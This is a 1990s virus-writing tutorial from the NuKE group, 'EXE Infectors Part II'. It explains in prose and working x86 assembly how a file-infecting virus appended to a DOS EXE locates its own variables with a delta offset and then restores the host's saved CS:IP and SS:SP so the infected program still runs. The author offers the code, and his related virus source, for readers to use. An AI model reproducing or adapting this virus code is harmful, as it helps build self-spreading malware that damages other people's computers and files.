102 lines
7.4 KiB
Plaintext
102 lines
7.4 KiB
Plaintext
|
|
*****************************
|
|
** EXE Infectors Part II **
|
|
** **
|
|
** By Rock Steady/NuKE **
|
|
*****************************
|
|
|
|
The first part consisted on how to Infect the EXE file, from a resident
|
|
virus. However, that is only HALF the code and understanding needed for
|
|
EXE infectors. The part to follow, is on how to give control back to the
|
|
original EXE file. This is one part of EXE infectors, that mostly EVERY
|
|
ONE tend to forget to point out. Big tickle, you know how to infect the
|
|
EXE, but can you make the original EXE run after its infection? Do you
|
|
know how to restore the registers we took from the EXE header? Anyhow
|
|
lets get going...
|
|
|
|
If the Infected EXE file is now executed, the first Line of Code it will
|
|
encounter will be the first byte of our Virus. Since CS:IP have been
|
|
changed in the header (Part I) to point to our Virus. The first thing
|
|
we will need to do, is set up a Variable offset, (As I call it). Basically
|
|
when TASM compiles our virus, all variables and other data locations are
|
|
given a FIX address. Though in the case of the Virus this is NOT GOOD as
|
|
viruses, tend to append themselves, and therefore variables are never
|
|
in the same location...
|
|
Fig 1.
|
|
(Original ASM Source)
|
|
CALL doit_Now ;Call PUSHes CS:IP addresses
|
|
doit_now: POP BP ;POP in BP the IP register
|
|
SUB BP,offset doit_now ;Make it EQUAL 0 for first Compile!
|
|
MOV AX,word ptr cs:[variable+BP] ;BP=0 now it works!
|
|
...
|
|
variable dd 55
|
|
When TASM Compiles the above Code it turns it into Fig 2. (Below)
|
|
Fig 2. Fig 3.
|
|
(Virus Just Compiled) (Virus Infect to a file)
|
|
1234:0100 CALL 1234:0103 1234:0100 JMP 500
|
|
1234:0103 POP BP 1234:0102 ... (Infect File)
|
|
1234:0104 SUB BP,0103 ... '' ''
|
|
1234:0107 MOV AX,[0200+BP] 1234:0200 ... '' ''
|
|
... ... '' ''
|
|
1234:0200 dd 55 1234:0500 CALL 1234:0503
|
|
1234:0503 POP BP (BP=503)
|
|
1234:0504 SUB BP,0103 (BP=400)
|
|
1234:0507 MOV AX,[0200+BP]
|
|
... (200+BP=600)
|
|
1234:0600 dd 55
|
|
Later when the Virus infects a File, it will represent Fig 3. Now, when
|
|
the CALL command is executed, it PUSHes into the Stacks the NEXT CS:IP
|
|
so when it has to RETurn, all it has to do is POP back the CS:IP to know
|
|
exactly where it left off! So we can take advantage of the command, by
|
|
POPing back ourselves, thus this will give us the NEXT byte from the CALL
|
|
command. which as you see, in the examples is our POP BP statement.
|
|
|
|
However when the Virus is Freshly Compiled, all Registers values are GOOD,
|
|
so that is why we must make BP=0 the first time, as the variables were
|
|
set according to the sources, so no adjustment needed, though when we
|
|
infect a file, this BP Variable Pointer come ALIVE! (View Fig 3. + Fig 2.)
|
|
|
|
Boy, That was the HARDEST part of that, Now if you found that simple pat
|
|
yourself on the back, as that is the only `BIG' Conflict people tend to
|
|
disregard or forget. So any time while you are NOT resident but infected
|
|
on the file, and you are running code from the infected file just use the
|
|
that BP Variable Pointer, for any data being loaded... Now lets put the
|
|
routine together, along with the routine to EXECUTE the original EXE file
|
|
|
|
; After the Virus Has moved a copy of itself in memory, Control must be
|
|
; Given back to the Original EXE file we just infected... This is the
|
|
; Routine to do it..
|
|
exit_exe_file:
|
|
mov bx,word ptr cs:[buffer+22][bp] ;Loads CS register
|
|
mov ax,cs ;Move current CS in AX
|
|
sub ax,bx ;Subtract for alinment
|
|
mov dx,ax
|
|
add ax,word ptr cs:[exe_cs][bp] ;Get ORIGINAL CS
|
|
add dx,word ptr cs:[exe_ss][bp] ;Get ORIGINAL SS
|
|
mov bx,word ptr cs:[exe_ip][bp] ;Get ORIGINAL IP
|
|
mov word ptr cs:[fuck_yeah][bp],bx ;Put IP
|
|
mov word ptr cs:[fuck_yeah+2][bp],ax ;Put CS (Reverse Order)
|
|
mov ax,word ptr cs:[exe_sp][bp] ;Get ORIGNAL SP
|
|
mov word ptr cs:[Rock_fix1][bp],dx ;Put in SS
|
|
mov word ptr cs:[Rock_fix2][bp],ax ;Put in SP
|
|
db 0B8h ;The Byte `B80000' is really a MOV AX,????
|
|
Rock_Fix1: ;???? is the Value of SS that we will put into
|
|
dw 0 ;THIS LINE!
|
|
cli ;Disable Interrupts (No Jamming)
|
|
mov ss,ax ;Mov the AX (really SS) into SS register
|
|
db 0BCh ;Byte `BC0000' is really a MOV SP,????
|
|
Rock_Fix2: ;???? is the Value of SP that we will put into
|
|
dw 0 ;THIS LINE!!
|
|
sti ;Enable Interrupts
|
|
db 0EAh ;The Byte `EA00000000' is a JMP CS:IP How ever
|
|
fuck_Yeah: ;IP comes FIRST then CS (Reverse Order) And then
|
|
dd 0 ;the Virus does the JMP CS:IP to the Original
|
|
; Simple huh?
|
|
; To see this as a HOLE Virus look at `NuKE PoX V1.1' Virus Sources Codes
|
|
; Made by me (Rock Steady) As you can see the Code is ORGINAL, and nothing
|
|
; that looks like any of them Sources we see around. Though I give it to
|
|
; you to use.
|
|
Rock Steady / NuKE
|
|
`One, Two, One, Two, One, Two... Come On Get into that Olympic Spirit'
|
|
`Lose Them pounds, Get Rid of that unwanted FAT of them Drives...'
|